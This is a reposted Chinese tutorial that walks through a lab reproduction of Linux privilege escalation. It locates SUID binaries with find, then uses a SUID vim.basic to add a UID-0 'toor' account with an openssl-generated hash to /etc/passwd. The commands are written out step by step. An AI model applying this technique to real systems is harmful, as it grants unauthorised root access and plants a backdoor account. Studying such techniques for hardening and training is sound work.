服务器之家:专注于服务器技术及软件下载分享
分类导航

Linux|Centos|Ubuntu|系统进程|Fedora|注册表|Bios|Solaris|Windows7|Windows10|

服务器之家 - 服务器系统 - Linux - Linux使用suid vim.basic文件实现提权

Linux使用suid vim.basic文件实现提权

2020-07-31 22:37This_is_Y Linux

这篇文章主要介绍了Linux使用suid vim.basic文件实现提权,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下

在kali上复现

先给需要的vim.basic文件设置suid权限

chmod u+s /usr/bin/vim.basic

先adduser test1一个普通权限用户

现在就是一个合适的提权环境

通过以下命令可以找到存在suid权限的文件

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

可用于提权的文件有

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

Linux使用suid vim.basic文件实现提权

利用vim提权的思路是修改etc/passwd文件,为自己添加一个有root权限的用户

passwd文件用户格式为:用户名:密码:uid:gid:注释:home目录:用户的shell

这边可以看看root用户的格式

root:x:0:0:root:/root:/bin/bash

(密码这部分之所以是x,是因为真正的密码存在/etc/shadow文件里)

Linux使用suid vim.basic文件实现提权

生成密码:用openssl passwd -1 –salt asd 123 (这里是-1(数字1)不是L)

直接写在passwd文件里面,

Linux使用suid vim.basic文件实现提权

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

用vim /etc/passwd可以修改,但是在保存是会出现E212,无法保存,提示我们没有权限修改这个

Linux使用suid vim.basic文件实现提权

这时应该用之前find找到的vim.basic文件运行,这个程序是有suid权限的。绝对可以修改

vim.basic /etc/passwd

用这个打开,然后修改文件,就可以成功保存

Linux使用suid vim.basic文件实现提权

可以看到已经添加了,su toor切换,密码123,再id查看一下权限

Linux使用suid vim.basic文件实现提权

root权限

chmod u+s /usr/bin/vim.basic

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持服务器之家。

原文链接:https://www.cnblogs.com/This-is-Y/p/13211224.html

延伸 · 阅读

精彩推荐
  • LinuxLinux中的wget网络下载命令使用全解

    Linux中的wget网络下载命令使用全解

    在Linux上下载安装应用程序除了使用包管理器外,最常用的就是wget命令了,wget支持多种网络协议,简单而强大,这里我们就来看一下Linux中的wget网络下载命令使...

    lucifercn4942019-06-14
  • LinuxLinux系统部分软件中文显示乱码方框该怎么办?

    Linux系统部分软件中文显示乱码方框该怎么办?

    Linux系统部分软件中文显示乱码方框该怎么办?Linux下部分软件会出现中文显示异常的问题。如Netbeans等依赖JVM虚拟机运行的软件。这是由于JVM中文显示的字...

    服务器之家3832019-09-18
  • LinuxLinux系统中fstab文件丢失的恢复方法

    Linux系统中fstab文件丢失的恢复方法

    这篇文章主要为大家介绍了Linux系统fstab文件丢失了该怎么解决?/etc/fstab配置文件决定了Linux系统在启动后如何加载各分区,若分区无法挂载,系统也将无法...

    Linux教程网3092019-11-01
  • Linuxiptables建立规则和链的基本方法

    iptables建立规则和链的基本方法

    这篇文章主要介绍了iptables建立规则和链的基本方法,iptables是常用的Linux集成的IP过滤规则系统,需要的朋友可以参考下...

    大步's blog1872019-09-06
  • Linux详细讲解Linux系统中pwd命令的使用技巧

    详细讲解Linux系统中pwd命令的使用技巧

    这篇文章主要介绍了详细讲解Linux系统中pwd命令的使用技巧,pwd命令的基本功能为打印当前目录,但本文中将会罗列pwd的14个引申用法,需要的朋友可以参考下...

    开源中文社区3512019-09-25
  • Linuxlinux系统怎么使用alias创建命令别名?

    linux系统怎么使用alias创建命令别名?

    linux系统怎么使用alias创建命令别名?linux系统中有很多命令,今天我们就来看看alias命令的使用方法,详细请看下文介绍 ...

    百度经验2022020-05-05
  • Linuxlinux awk删除文本重复行需要注意强制类型转换的问题

    linux awk删除文本重复行需要注意强制类型转换的问题

    这篇文章主要介绍了linux awk删除文本重复行需要注意强制类型转换的问题 ,需要的朋友可以参考下...

    linux之家3272019-06-10
  • Linux使用awk的next命令的方法

    使用awk的next命令的方法

    next 命令帮助你阻止运行命令执行过程中多余的步骤;一些朋友还不知道如何使用awk的next命令;下面小编为大家带来使用awk的next命令的方法;有需要的朋友...

    脚本之家4302019-06-11